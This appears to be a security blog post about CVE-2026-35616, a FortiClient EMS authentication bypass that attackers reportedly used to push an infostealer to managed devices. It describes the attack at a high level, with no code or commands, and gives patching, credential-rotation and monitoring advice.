CVE-2026-35616: Your Security Tool Just Installed Malware on Every Device

#Your security software just attacked you.

I need you to sit with that for a second.

FortiClient EMS is an endpoint management system. Its job is to manage and secure every device in your organization. Push updates, enforce policies, make sure everything is patched and protected. It's the tool your IT provider uses to keep your fleet healthy.

CVE-2026-35616 is a CVSS 9.1 authentication bypass in FortiClient EMS that lets an unauthenticated attacker send privileged requests to the management server. No login. No credentials. Just forge a header and you're in.

What did the attackers do with that access? They used FortiClient EMS to push malware to every managed endpoint in the organization. Disguised as a Fortinet firmware update. Delivered through PowerShell. Silently executed on every device that trusts the management server.

The malware is called EKZ Infostealer. It grabs:

• Chrome and Firefox saved passwords (including bypassing Chrome's encrypted storage)
• Credit card details saved in browsers
• Addresses and phone numbers from autofill
• Session cookies (which let attackers access accounts protected by MFA without needing the second factor)

Every device. Every browser. Every saved password. All delivered by the tool that was supposed to protect them.

#Let me spell out why this is so bad.

The whole point of endpoint management is trust. Your devices trust the management server. They accept whatever it pushes. Updates, configurations, policies, software installs. That trust is the foundation of the entire system.

When an attacker compromises the management server, they inherit that trust. They become your IT department. They can push anything to every device and every device will accept it because "it came from the management server."

This isn't a theoretical problem. Arctic Wolf documented this exact attack happening in the wild. Real organizations. Real credential theft. Real damage.

And the beautiful (terrible) part? The malware was disguised as a legitimate Fortinet patch. So even if someone noticed a new install on their machine, it looked like a routine update. Nothing suspicious. Move along.

#This keeps happening with Fortinet.

I'm going to be blunt. Fortinet has had a rough couple of years. This is not the first critical Fortinet vulnerability, and the pattern is getting hard to ignore:

• CVE-2026-35616: FortiClient EMS authentication bypass (this one)
• Multiple FortiOS vulnerabilities exploited throughout 2025-2026
• Part of the 56% of compromised networks that trace back to edge device exploitation

If you're running Fortinet products, you need to be monitoring their PSIRT advisories weekly. Not monthly. Not "when we get around to it." Weekly.

And you need to be honest with yourself about whether your team has the capacity to respond to critical CVEs within 72 hours. Because the attackers are responding within hours.

#What to do right now.

If you run FortiClient EMS:

1. Patch to version 7.4.7 or later. Hotfixes are available for 7.4.5 and 7.4.6. Don't wait for the next maintenance window.

1. Check for indicators of compromise. Look for unusual PowerShell execution on managed endpoints. Look for unexpected outbound connections. Look for the EKZ payload (Arctic Wolf's blog has the IOCs).

1. Rotate every credential that was stored in a browser on any managed device. If the attacker got EKZ onto your endpoints, they have every saved password. Every one. Change them all. Yes, all of them.

1. Invalidate active browser sessions. The attacker stole cookies, which means they can access accounts without passwords or MFA. Force re-authentication on every service: Microsoft 365, Google Workspace, banking, CRM, everything.

For everyone else:

1. Audit what your endpoint management system can do. Whatever tool you use (Intune, Jamf, ConnectWise, NinjaOne, whatever), understand the level of access it has. If it's compromised, what can the attacker push? What can they access? This is your blast radius.

1. Restrict management server access. Your EMS/RMM server should not be reachable from the public internet without a VPN or IP allowlist. If an unauthenticated attacker can reach it from anywhere, you're one CVE away from this exact scenario.

1. Monitor management server activity. Log every action. Alert on unexpected software pushes, policy changes, or new device enrollments. The attackers used the legitimate management channel, so traditional endpoint detection might not catch it. You need to watch the management plane itself.

#The uncomfortable truth about managed security.

A lot of small businesses outsource their security to an MSP that uses exactly these tools. FortiClient EMS, ConnectWise, Datto, NinjaOne. The MSP manages hundreds of clients through a single management platform.

If the MSP's management platform gets compromised, every client gets compromised simultaneously. One vulnerability, one exploit, hundreds of businesses.

This isn't hypothetical. It's happened before (see: Kaseya VSA, 2021) and it will happen again. The question is whether your MSP is monitoring for it, patching for it, and prepared to respond.

Ask your MSP: "How quickly can you patch a critical CVE in your management platform?" If the answer is anything slower than "same day," that's your risk.

#Further reading

• Arctic Wolf: FortiClient EMS CVE-2026-35616 Analysis - the incident report with IOCs
• Fortinet PSIRT Advisories - official vulnerability disclosures
• CISA Known Exploited Vulnerabilities - check if your products have active exploits
• NinjaOne RMM Security Best Practices - hardening your management platform